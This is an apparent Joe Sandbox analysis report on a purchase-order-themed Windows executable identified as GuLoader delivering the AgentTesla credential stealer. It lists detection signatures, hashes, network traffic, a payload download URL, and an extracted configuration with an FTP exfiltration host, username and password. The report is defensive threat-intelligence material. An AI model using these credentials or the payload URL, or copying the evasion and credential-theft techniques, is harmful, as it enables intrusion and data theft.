Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO 0309494059506060609696007.exe

Overview

General Information

Sample name:PO 0309494059506060609696007.exe
Analysis ID:1577289
MD5:0be2d87edbe429042bf5eb8791a40bfd
SHA1:56d20ae6ba8bcbf137164efe5ebb846b5dabfb3e
SHA256:447a4c0228f0f8c81f9159366e8cdda2af4a5603249f8bf6ceb6fe0d40f32b9a
Tags:AgentTeslaexeGuLoaderuser-abuse_ch
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.2985734284.00000000332AC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000002.2985734284.0000000033281000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.2985734284.0000000033281000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.2279273264.0000000004476000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: PO 0309494059506060609696007.exe PID: 2128JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-18T11:07:28.264137+010028032702Potentially Bad Traffic192.168.2.44975284.38.133.4880TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: PO 0309494059506060609696007.exeAvira: detected
            Source: http://84.38.133.48/LSOzHkHtJlArws124.binAvira URL Cloud: Label: malware
            Source: http://84.38.133.48/LSOzHkHtJlArws124.bin.#Avira URL Cloud: Label: malware
            Source: http://ftp.concaribe.comAvira URL Cloud: Label: malware
            Source: http://concaribe.comAvira URL Cloud: Label: malware
            Source: PO 0309494059506060609696007.exe.6428.0.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
            Source: PO 0309494059506060609696007.exeVirustotal: Detection: 9%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: PO 0309494059506060609696007.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49759 version: TLS 1.2
            Source: PO 0309494059506060609696007.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059CC
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_00402868 FindFirstFileW,4_2_00402868
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_004059CC
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_004065FD FindFirstFileW,FindClose,4_2_004065FD
            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
            Source: Joe Sandbox ViewIP Address: 192.185.13.234 192.185.13.234
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49752 -> 84.38.133.48:80
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /LSOzHkHtJlArws124.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.133.48Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /LSOzHkHtJlArws124.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.133.48Cache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: ftp.concaribe.com
            Source: PO 0309494059506060609696007.exe, 00000004.00000002.2965947526.0000000002AD8000.00000004.00000020.00020000.00000000.sdmp, PO 0309494059506060609696007.exe, 00000004.00000002.2985361297.0000000032360000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://84.38.133.48/LSOzHkHtJlArws124.bin
            Source: PO 0309494059506060609696007.exe, 00000004.00000002.2965947526.0000000002AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://84.38.133.48/LSOzHkHtJlArws124.bin.#
            Source: PO 0309494059506060609696007.exe, 00000004.00000002.2985734284.00000000332AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://concaribe.com
            Source: PO 0309494059506060609696007.exe, 00000004.00000002.2985734284.00000000332AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.concaribe.com
            Source: PO 0309494059506060609696007.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: PO 0309494059506060609696007.exe, 00000004.00000002.2985734284.0000000033231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: PO 0309494059506060609696007.exe, 00000004.00000002.2985734284.0000000033231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: PO 0309494059506060609696007.exe, 00000004.00000002.2985734284.0000000033231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: PO 0309494059506060609696007.exe, 00000004.00000002.2985734284.0000000033231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49759 version: TLS 1.2
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 0_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405461
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040338F
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 0_2_00406B150_2_00406B15
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 0_2_004072EC0_2_004072EC
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 0_2_00404C9E0_2_00404C9E
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 0_2_6E421B5F0_2_6E421B5F
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_00406B154_2_00406B15
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_004072EC4_2_004072EC
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_00404C9E4_2_00404C9E
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_0015A2204_2_0015A220
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_0015E3604_2_0015E360
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_0015A5904_2_0015A590
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_00154A584_2_00154A58
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_0015AAAC4_2_0015AAAC
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_00153E404_2_00153E40
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_001541884_2_00154188
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_362592C84_2_362592C8
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_3625BB904_2_3625BB90
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_3625A7DC4_2_3625A7DC
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_362656A04_2_362656A0
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_362666C04_2_362666C0
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_3626C2404_2_3626C240
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_3626B2F04_2_3626B2F0
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_362631584_2_36263158
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_362677604_2_36267760
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_3626E4684_2_3626E468
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_36265DB74_2_36265DB7
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_3626CAD04_2_3626CAD0
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_362623704_2_36262370
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_362600404_2_36260040
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_36632C514_2_36632C51
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_362600124_2_36260012
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: String function: 00402C41 appears 51 times
            Source: PO 0309494059506060609696007.exeStatic PE information: invalid certificate
            Source: PO 0309494059506060609696007.exe, 00000000.00000000.1708434410.0000000000473000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameteth.exej% vs PO 0309494059506060609696007.exe
            Source: PO 0309494059506060609696007.exe, 00000004.00000002.2985643888.0000000032F49000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PO 0309494059506060609696007.exe
            Source: PO 0309494059506060609696007.exe, 00000004.00000000.2276915706.0000000000473000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameteth.exej% vs PO 0309494059506060609696007.exe
            Source: PO 0309494059506060609696007.exe, 00000004.00000002.2965947526.0000000002B13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO 0309494059506060609696007.exe
            Source: PO 0309494059506060609696007.exeBinary or memory string: OriginalFilenameteth.exej% vs PO 0309494059506060609696007.exe
            Source: PO 0309494059506060609696007.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/10@2/3
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 4_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040338F
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 0_2_00404722 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404722
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeFile created: C:\Users\user\AppData\Local\sillinessesJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeMutant created: NULL
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeFile created: C:\Users\user\AppData\Local\Temp\nsi11AE.tmpJump to behavior
            Source: PO 0309494059506060609696007.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: PO 0309494059506060609696007.exeVirustotal: Detection: 9%
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeFile read: C:\Users\user\Desktop\PO 0309494059506060609696007.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\PO 0309494059506060609696007.exe "C:\Users\user\Desktop\PO 0309494059506060609696007.exe"
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess created: C:\Users\user\Desktop\PO 0309494059506060609696007.exe "C:\Users\user\Desktop\PO 0309494059506060609696007.exe"
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeProcess created: C:\Users\user\Desktop\PO 0309494059506060609696007.exe "C:\Users\user\Desktop\PO 0309494059506060609696007.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\PO 0309494059506060609696007.exeSection loaded: dnsapi.dllJump to behavior
